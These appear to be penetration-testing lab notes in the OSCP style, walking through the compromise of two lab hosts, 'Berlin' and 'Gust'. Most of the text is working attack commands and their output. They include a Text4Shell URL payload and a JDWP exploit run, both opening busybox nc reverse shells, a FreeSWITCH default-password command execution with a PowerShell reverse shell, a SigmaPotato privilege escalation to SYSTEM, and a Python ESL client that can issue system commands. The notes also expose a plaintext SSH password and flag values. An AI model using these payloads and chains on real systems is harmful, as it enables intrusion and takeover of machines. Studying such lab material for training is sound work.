-rw-r--r-- 1 john john 7752 Dec 22 06:27 exploit-2.c
john@oscp:~/dirtypipe$ ./exploit-1
Backing up /etc/passwd to /tmp/passwd.bak ...
Setting root password to "piped"...
Password: Restoring /etc/passwd from /tmp/passwd.bak...
Done! Popping shell... (run commands now)
id
uid=0(root) gid=0(root) groups=0(root)
Read proof.txt
ls
proof.txt snap
cat proof.txt
8b74eaa1f18d71c13cc32fef344a8af0
192.168.162.150 - Berlin
Nmap
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
Initial Access
Enumerated directories using gobuster and found accessible paths:
- search
- CHANGELOG
┌──(kali🎃kali)-[~/oscp/150]
└─$ gobuster dir -u http://192.168.162.150:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.162.150:8080
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/search (Status: 200) [Size: 25]
/error (Status: 500) [Size: 105]
/CHANGELOG (Status: 200) [Size: 194]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================
Accessed the /CHANGELOG endpoint and identified that the application uses “Apache Commons Text 1.8”, which is vulnerable to Text4Shell (CVE-2022-42889)
┌──(kali🎃kali)-[~]
└─$ curl http://192.168.162.150:8080/CHANGELOG
# Changelog
Version 0.2
- Added Apache Commons Text 1.8 Dependency for String Interpolation
Version 0.1
- Initial beta version based on Spring Boot Framework
- Added basic search functionality
Executed the PoC exploit
┌──(kali🎃kali)-[~/oscp/150]
└─$ curl http://192.168.162.150:8080/search?query=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27busybox%20nc%20192.168.45.187%204444%20-e%20sh%27%29%7D%25
{"query":"${script:javascript:java.lang.Runtime.getRuntime().exec('busybox nc 192.168.45.187 4444 -e sh')}%","result":""}
Successfully established a reverse shell connection
┌──(kali🎃kali)-[~]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.162.150] 51490
id
uid=1001(dev) gid=1001(dev) groups=1001(dev)
Read local.txt
dev@oscp:~$ ls
ls
local.txt
dev@oscp:~$ cat local.txt
cat local.txt
af8c3d8bb8d322ac20c2a3c1fc679112
Privilege Escalation
Executed linpeas and found a JDWP debug agent listening on port 8000 in a process running as root, which is exploitable
- java -Xdebug -Xrunjdwp:transport=dt_socket,address=8000,server=y /opt/stats/App.java
╔══════════╣ Running processes (cleaned)
╚ Check weird & unexpected processes run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes
root 1 0.0 0.6 167628 12960 ? Ss 03:16 0:01 /sbin/init
root 500 0.0 1.1 80664 24048 ? S<s 03:16 0:00 /lib/systemd/systemd-journald
root 541 0.0 1.3 354888 27364 ? SLsl 03:16 0:00 /sbin/multipathd -d -s
root 543 0.0 0.3 25736 6760 ? Ss 03:16 0:00 /lib/systemd/systemd-udevd
systemd+ 724 0.0 0.3 89352 6544 ? Ssl 03:17 0:00 /lib/systemd/systemd-timesyncd
└─(Caps) 0x0000000002000000=cap_sys_time
root 733 0.0 0.5 51124 11936 ? Ss 03:17 0:00 /usr/bin/VGAuthService
root 734 0.0 0.4 315928 9800 ? Ssl 03:17 0:06 /usr/bin/vmtoolsd
systemd+ 820 0.0 0.3 16236 8068 ? Ss 03:17 0:00 /lib/systemd/systemd-networkd
└─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw
systemd+ 822 0.0 0.6 25392 12260 ? Ss 03:17 0:00 /lib/systemd/systemd-resolved
└─(Caps) 0x0000000000002000=cap_net_raw
dev 841 1.1 26.3 2616740 533860 ? Ssl 03:17 2:31 java -jar /opt/dev/api.jar
dev 2273 0.0 0.0 2456 4 ? S 06:59 0:00 _ sh
dev 2275 0.0 0.1 7368 3464 ? S 07:00 0:00 _ /bin/bash
dev 2278 0.0 0.4 17480 8700 ? S 07:01 0:00 _ python3 -c import pty; pty.spawn("/bin/bash")
dev 2279 0.0 0.2 8692 5312 pts/0 Ss 07:01 0:00 _ /bin/bash
dev 2286 0.0 0.2 8692 5376 pts/0 S 07:01 0:00 _ /bin/bash
dev 2296 0.0 0.2 8584 5336 pts/0 S 07:02 0:00 _ /bin/bash
dev 2313 0.1 0.1 4004 2988 pts/0 S+ 07:03 0:00 _ /bin/sh ./linpeas.sh
dev 5625 0.0 0.0 4004 1204 pts/0 S+ 07:04 0:00 | _ /bin/sh ./linpeas.sh
dev 5629 0.0 0.1 10404 3784 pts/0 R+ 07:04 0:00 | | _ ps fauxwww
dev 5628 0.0 0.0 4004 1204 pts/0 S+ 07:04 0:00 | _ /bin/sh ./linpeas.sh
dev 2314 0.0 0.0 5772 1020 pts/0 S+ 07:03 0:00 _ tee linpeas
root 843 0.0 0.1 6892 3048 ? Ss 03:17 0:00 /usr/sbin/cron -f -P
message+ 845 0.0 0.2 8892 4680 ? Ss 03:17 0:00 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
└─(Caps) 0x0000000020000000=cap_audit_write
root 852 0.0 0.9 32780 18496 ? Ss 03:17 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root 853 0.0 0.3 234492 6692 ? Ssl 03:17 0:00 /usr/libexec/polkitd --no-debug
syslog 854 0.0 0.2 222400 5664 ? Ssl 03:17 0:00 /usr/sbin/rsyslogd -n -iNONE
root 856 0.0 1.4 1318624 28632 ? Ssl 03:17 0:00 /usr/lib/snapd/snapd
root 859 0.0 1.7 2528964 35288 ? Ssl 03:17 0:00 java -Xdebug -Xrunjdwp:transport=dt_socket,address=8000,server=y /opt/stats/App.java
root 860 0.0 0.3 15024 6240 ? Ss 03:17 0:00 /lib/systemd/systemd-logind
root 862 0.0 0.6 392584 12908 ? Ssl 03:17 0:00 /usr/libexec/udisks2/udisksd
root 870 0.0 0.0 6172 1108 tty1 Ss+ 03:17 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
root 894 0.0 0.5 317008 11820 ? Ssl 03:17 0:00 /usr/sbin/ModemManager
root 949 0.0 1.0 109756 20976 ? Ssl 03:17 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root 1525 0.0 0.4 313340 8924 ? Ssl 04:45 0:00 /usr/libexec/upowerd
root 1797 0.0 0.9 295628 18600 ? Ssl 04:45 0:00 /usr/libexec/packagekitd
Downloaded exploit code
┌──(kali🎃kali)-[~/oscp/150]
└─$ searchsploit jdwp
-------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------- ---------------------------------
Java Debug Wire Protocol (JDWP) - Remote Code Execution | java/remote/46501.py
-------------------------------------------------------------------------------------- ---------------------------------
Set up SSH reverse port forwarding to reach port 8000 from Kali
dev@oscp:/$ ssh -f -N -R 8000:localhost:8000 kali@192.168.45.187
The authenticity of host '192.168.45.187 (192.168.45.187)' can't be established.
ED25519 key fingerprint is SHA256:C/sPlE+2KjQOvOF6Xgy+YaE8+67OyeJHsui04dPIApU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])?
Host key verification failed.
The first attempt failed because the host-key prompt went unanswered in the non-tty shell; answering yes on the retry records Kali's key and the forward comes up
dev@oscp:/$ ssh -f -N -R 8000:localhost:8000 kali@192.168.45.187
The authenticity of host '192.168.45.187 (192.168.45.187)' can't be established.
ED25519 key fingerprint is SHA256:C/sPlE+2KjQOvOF6Xgy+YaE8+67OyeJHsui04dPIApU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.45.187' (ED25519) to the list of known hosts.
kali@192.168.45.187's password: kali
Executed reverse shell listener
┌──(kali🎃kali)-[~/oscp]
└─$ rlwrap nc -nlvp 9999
listening on [any] 9999 ...
Executed the POC: first ex.sh, whose injected payload calls back to port 4444 with the dev shell used below, then the JDWP exploit against the forwarded port 8000
┌──(kali🎃kali)-[~/oscp]
└─$ ./ex.sh
{"query":"${script:javascript:java.lang.Runtime.getRuntime().exec('busybox nc 192.168.45.187 4444 -e sh')}%","result":""}
┌──(kali🎃kali)-[~/oscp]
└─$ python2 46501.py -t 127.0.0.1 -p 8000 --cmd 'busybox nc 192.168.45.187 9999 -e sh'
[+] Targeting '127.0.0.1:8000'
[+] Reading settings for 'OpenJDK 64-Bit Server VM - 11.0.16'
[+] Found Runtime class: id=8b1
[+] Found Runtime.getRuntime(): id=7f395402e0a8
[+] Created break event id=2
[+] Waiting for an event on 'java.net.ServerSocket.accept'
The exploit plants a breakpoint on java.net.ServerSocket.accept and only runs the command once that breakpoint fires, so it sat waiting. From the dev shell, verified that port 5000 was listening and connected to it to trigger the accept
dev@oscp:/$ ss -nltp
ss -nltp
State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 50 *:5000 *:*
LISTEN 0 100 *:8080 *:* users:(("java",pid=841,fd=11))
LISTEN 0 128 [::]:22 [::]:*
dev@oscp:/$ nc 127.0.0.1 5000
nc 127.0.0.1 5000
The breakpoint fired, the injected command ran inside the JVM, and the listener on 9999 received a shell as root
┌──(kali🎃kali)-[~/oscp]
└─$ rlwrap nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.162.150] 46746
whoami
root
id
uid=0(root) gid=0(root)
Read proof.txt
root@oscp:/root# cat proof.txt
cat proof.txt
95319f177685c8ec21f6bc951aaeb599
root@oscp:/root# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.162.150 netmask 255.255.255.0 broadcast 192.168.162.255
ether 00:50:56:ab:f4:e3 txqueuelen 1000 (Ethernet)
RX packets 1677 bytes 166311 (166.3 KB)
RX errors 0 dropped 115 overruns 0 frame 0
TX packets 464 bytes 604716 (604.7 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 8908 bytes 1268133 (1.2 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 8908 bytes 1268133 (1.2 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
192.168.162.151 - Gust
Nmap
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
8021/tcp open ftp-proxy
Initial Access
Searched for "8021/tcp open freeswitch-event FreeSWITCH mod_event_socket" and found that the service is exploitable: mod_event_socket is protected by nothing but a shared password, which ships as ClueCon in event_socket.conf.xml, and an authenticated client can issue api system <command> to run OS commands as the account FreeSWITCH runs under
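What the exploit does on the wire, as an added example written for this page (not 47799.py itself): a small ESL client that parses the server's header/body messages, performs the auth step, and can issue an api command. check_default_password only attempts authentication with ClueCon and runs nothing, so it doubles as a check that a FreeSWITCH host still carries the shipped password. The server bytes in SAMPLE_SERVER_BYTES are constructed to mirror the exchange shown in the output further down, not a capture from Gust; the port default of 8021 is FreeSWITCH's stock listen-port.

```python
"""Minimal FreeSWITCH Event Socket (ESL) client.

Added example for this page, not the code of 47799.py.  ESL messages are
MIME-like: header lines, a blank line, then a body whose size is given by
Content-Length (no header means no body).
"""
import socket

DEFAULT_PASSWORD = "ClueCon"  # value shipped in event_socket.conf.xml


class ESLStream:
    """Incremental ESL message reader over any recv(n) -> bytes callable."""

    def __init__(self, recv):
        self._recv = recv  # socket.recv, or an in-memory source for offline use
        self._buf = b""

    def _fill(self):
        chunk = self._recv(4096)
        if not chunk:
            raise ConnectionError("ESL peer closed the connection")
        self._buf += chunk

    def read_message(self):
        """Return (headers, body) for the next complete message."""
        while b"\n\n" not in self._buf:
            self._fill()
        head, self._buf = self._buf.split(b"\n\n", 1)
        headers = {}
        for line in head.decode("utf-8", "replace").split("\n"):
            if ":" in line:
                key, value = line.split(":", 1)
                headers[key.strip()] = value.strip()
        length = int(headers.get("Content-Length", "0"))
        while len(self._buf) < length:
            self._fill()
        body, self._buf = self._buf[:length], self._buf[length:]
        return headers, body


def bytes_source(data):
    """Wrap a constructed byte string as a recv(n) callable for offline runs."""
    pending = [data]

    def recv(n):
        chunk, pending[0] = pending[0][:n], pending[0][n:]
        return chunk

    return recv


def authenticate(stream, send, password):
    """Answer the server's auth/request; True iff the reply is +OK."""
    headers, _ = stream.read_message()
    if headers.get("Content-Type") != "auth/request":
        raise ValueError("expected auth/request, got %r" % headers.get("Content-Type"))
    send(("auth %s\n\n" % password).encode("utf-8"))
    headers, _ = stream.read_message()
    return headers.get("Reply-Text", "").startswith("+OK")


def api_command(stream, send, command):
    """Run 'api <command>' on an authenticated session; return the response body."""
    send(("api %s\n\n" % command).encode("utf-8"))
    headers, body = stream.read_message()
    if headers.get("Content-Type") != "api/response":
        raise ValueError("unexpected reply type %r" % headers.get("Content-Type"))
    return body.decode("utf-8", "replace")


def check_default_password(host, port=8021, password=DEFAULT_PASSWORD, timeout=5.0):
    """Connect to a live ESL port and report whether `password` is accepted.

    Only the auth step is performed; no api command is sent.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return authenticate(ESLStream(sock.recv), sock.sendall, password)


# Constructed server transcript mirroring the exchange 47799.py produced on this
# page (auth accepted, then 'api system whoami' -> 'oscp\chris').  Not a capture.
SAMPLE_SERVER_BYTES = (
    b"Content-Type: auth/request\n\n"
    b"Content-Type: command/reply\nReply-Text: +OK accepted\n\n"
    b"Content-Type: api/response\nContent-Length: 11\n\noscp\\chris\n"
)


def replay_sample():
    """Drive the client against SAMPLE_SERVER_BYTES offline.

    Returns (auth_ok, whoami_output, list_of_bytes_the_client_sent).
    """
    sent = []
    stream = ESLStream(bytes_source(SAMPLE_SERVER_BYTES))
    ok = authenticate(stream, sent.append, DEFAULT_PASSWORD)
    output = api_command(stream, sent.append, "system whoami").strip() if ok else ""
    return ok, output, sent


if __name__ == "__main__":
    import sys
    if len(sys.argv) >= 2:
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 8021
        print("default password accepted:", check_default_password(sys.argv[1], port))
    else:
        print(replay_sample()[:2])
```

Hardening lives in event_socket.conf.xml: change the password parameter, set listen-ip to 127.0.0.1 unless remote ESL clients are genuinely needed, and fence what remains with apply-inbound-acl. Whatever account FreeSWITCH runs as becomes the attacker's account the moment the socket is reachable with a guessable password, which is exactly the oscp\chris shell obtained below.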
Downloaded poc exploit using searchsploit
┌──(kali🎃kali)-[~/oscp/151]
└─$ searchsploit -m 47799
Exploit: FreeSWITCH 1.10.1 - Command Execution
URL: https://www.exploit-db.com/exploits/47799
Path: /usr/share/exploitdb/exploits/windows/remote/47799.txt
Codes: N/A
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/oscp/151/47799.txt
Executed the POC (saved as 47799.txt by searchsploit and renamed to 47799.py) and confirmed that whoami ran, returning oscp\chris
┌──(kali🎃kali)-[~/oscp/151]
└─$ python 47799.py 192.168.162.151 whoami
Authenticated
Content-Type: api/response
Content-Length: 11
oscp\chris
Executed the POC again with a PowerShell reverse shell payload
┌──(kali🎃kali)-[~/oscp/151]
└─$ python 47799.py 192.168.162.151 "powershell -e <base64 payload omitted>"
Successfully established reverse shell connection
┌──(kali🎃kali)-[~]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.162.151] 49430
PS C:\Program Files\FreeSWITCH>
Read local.txt
PS C:\Users\chris\Desktop> dir
Directory: C:\Users\chris\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/22/2025 9:21 PM 34 local.txt
PS C:\Users\chris\Desktop> type local.txt
005c965265515e09dedb0509e532d642
PS C:\Users\chris\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.162.151
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.162.254
Privilege Escalation
Found SeImpersonatePrivilege enabled for oscp\chris, the account the FreeSWITCH process runs as; with it, a potato-family tool can coerce a SYSTEM authentication to a local listener and impersonate the resulting token
PS C:\Users\chris\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
Executed SigmaPotato.exe, which abuses SeImpersonatePrivilege to obtain a SYSTEM token and launch the supplied command, to get an elevated reverse shell
PS C:\Users\chris\Desktop> .\SigmaPotato.exe 'nc64.exe 192.168.45.187 9999 -e cmd.exe'
Successfully established the elevated reverse shell connection
┌──(kali🎃kali)-[~/Tools]
└─$ rlwrap nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.162.151] 49639
Microsoft Windows [Version 10.0.19043.2130]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Read proof.txt
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 949E-5CA2
Directory of C:\Users\Administrator\Desktop
11/04/2022 06:48 AM <DIR> .
11/04/2022 06:48 AM <DIR> ..
12/22/2025 09:21 PM 34 proof.txt
1 File(s) 34 bytes
2 Dir(s) 15,095,418,880 bytes free
C:\Users\Administrator\Desktop>type proof.txt
type proof.txt
4041d6e03f48fcbc3775fbf1bc846962
C:\Users\Administrator\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.162.151
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.162.254